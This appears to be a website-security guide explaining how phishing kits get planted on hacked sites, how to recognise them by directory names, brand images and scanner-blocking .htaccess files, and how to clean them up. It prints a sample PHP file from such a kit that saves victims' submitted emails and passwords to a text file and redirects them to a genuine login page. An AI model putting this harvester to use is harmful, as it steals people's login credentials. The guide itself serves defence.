Phishing is a malicious attempt to obtain sensitive information such as usernames, passwords, credit card information through a coordinated email and web-based campaign. Phishing starts with deceptive messages (emails, text messages, or other electronic communication) sent to the victim with links ending on hacked sites. The sensitive information is then collected and sent to the attacker.
Phishing files often are not immediately noticeable to the site owner as they are not included within normal site files. You might visit your site as you normally would never noticing a phishing operation within your site. Most site owners do not know that they have phishing files on their site until they are alerted by scans by an external party.
Removing phishing files requires analysis of the site’s code. These operations are rarely found tied to your database and are stand alone files buried within your content management system directories.
As the intent is to replicate a bank or ecommerce site’s design, the phishing file names often give them away. Image files are often included and have visually identifiable brand identifiers. There are often favicon files (*.ico) that look like the bank or ecommerce site’s logo as well as numerous image files used to give the page the look and feel of a bank or commerce site forgot password page, for instance. Sometimes a phishing operation is for a foreign trusted source, such as a bank on the other side of the world, and might not be immediately recognizable.
The easiest way to find a phishing operation is to download the site files locally for analysis. Phishing files are often grouped together, but you can often have more than one phishing operation installed on a single web site. They are usually contained within a directory, often named in a way that identifies the entity that they are emulating. For a bank, it might be the name of the bank, or use some other identifier similar to the type of phishing attack (e.g., password-reset, customer-information, banking-password).
Once you’ve identified and removed one set of phishing files, look for others as one compromised site can be a base for numerous phishing operations.
Here are some samples from a phishing operation. There are usually numerous files, but this is the file collecting the data. Files may or may not be obfuscated (intentionally obscured to make code ambiguous). There are often more than one file.
<html> <body> <?php $handle = fopen("password.txt", "a"); fwrite($handle,$_POST["Email"]); fwrite($handle,"\n"); fwrite($handle,$_POST["Passwd"]); fwrite($handle,"\n"); fwrite($handle,"\n"); fclose($handle) ; header("Location:https://www.[redacted].com/accounts/ServiceLoginAuth"); exit; ?> </body> </html>
There is also a related file, password.txt, collecting the phishing victim’s input.
We often find phishing pages that have .htaccess files that block indexing by search engines, malware scanners, and even some hosting providers.
Phishing pages are placed on the site through exploitation of some vulnerability on the site, either through backdoors, unpatched site code, or compromised administrative, FTP, or other accounts.
If you find phishing pages on your site, it is important to determine how those pages were placed. There may be other types of malware or security vulnerabilities on your site that allowed an attacker to gain access. A review of the entire site is important.
If after reading this guide, you are unsure of how to remove phishing pages, unsure if you have removed them all, or if you’re looking for more answers as to how the phishing pages were placed on your site, get help.